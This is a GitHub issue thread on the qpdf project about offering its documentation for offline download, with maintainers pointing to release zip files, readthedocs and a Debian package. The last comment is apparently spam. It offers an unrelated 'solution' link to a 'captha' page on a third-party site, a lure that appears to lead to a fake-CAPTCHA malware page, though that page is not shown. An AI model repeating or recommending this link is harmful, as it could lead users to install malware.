### ISSUE TITLE
Add documentation download

### ISSUE THREAD

**Issue by jidanni** [qpdf/qpdf#1299]
https://qpdf.readthedocs.io/en/stable/packaging.html mentions how to
make the documentation. But some users might just want to download a
copy for offline use.

E.g., https://gdal.org/en/latest/ says
> This documentation is also available as a PDF or a ZIP of individual HTML pages for offline browsing.

Yes, even if e.g., Debian offers a qpdf-doc package.

**Comment by m-holger** [comment]
Good point, thanks. I never noticed that the online documentation doesn't have the usual download options.

That said, a zip file with the documentation is available for download by following the "Releases" link, e.g. at https://github.com/qpdf/qpdf/releases/download/v11.9.1/qpdf-11.9.1-doc.zip

**Comment by jberkenbilt** [comment]
You can download it from readthedocs. Go to https://qpdf.readthedocs.io. Click on `stable` in the lower right corner. From there, you can find the download links. I had to search for it -- it used to be more obvious. Debian does have a qpdf-doc package, and that's because you, @jidanni , requested it in issue [1004159](https://bugs.debian.org/1004159) and I built the package as soon as the sphinx packages were new enough in all the versions I was backporting to, which happened in December 2023. But you should find qpdf-doc packages on debian and recent Ubuntu, where you can find the docs in /usr/share/doc/qpdf/, both PDF and HTML.

**Comment by AndyT-PrimoSpade** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
